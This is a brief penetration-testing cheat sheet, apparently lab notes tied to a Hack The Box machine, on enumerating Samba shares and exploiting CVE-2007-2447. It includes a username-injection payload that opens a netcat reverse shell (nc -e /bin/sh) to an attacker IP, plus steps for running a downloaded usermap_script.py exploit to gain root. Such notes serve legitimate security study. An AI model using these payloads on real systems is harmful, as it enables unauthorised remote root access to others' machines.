SMB Samba

Samba

smbclient -L 10.x.x.x   ..list shares
smbclient -H 10.x.x.x   ..host detail
rpcclient -U "" 10.x.x.x  ..null login attempt

smbclient //10.x.x.x/ADMIN$
smbclient //10.x.x.x/MyShare -U bob

Username attack

> nc -nvlp 1234  ..listener

Send shell metacharacters into the username with a reverse shell payload.
> logon "/=`nohup nc -nv 10.10.14.6 4444 -e /bin/sh`"
> whoami.. root!

Samba usermap script

  • Find samba 3.0.20 with nmap

  • Look up samba exploits: CVE-2007-2447

  • searchsploit samba 3.0.20

  • google/download: usermap_script.py

  • REF: LameHTB

> nc -nvlp 4444  ..listener
> python2 usermap_script.py -h
> python2 usermap_script.py rhost 445 lhost 4444
> whoami .. root!

Python2

python3 didnt work
Use python2, pip2, and pysmb
python ImportError No module named smb.SMBConnection

> python2 --version  ..2.7.18
> wget https://bootstrap.pypa.io/get-pip.py
> sudo python2.7 get-pip.py
> which pip2.7   ../usr/local/bin/pip2.7
> pip2.7 install pysmb

REF:

PreviousrpcNextSSH Tips

Last updated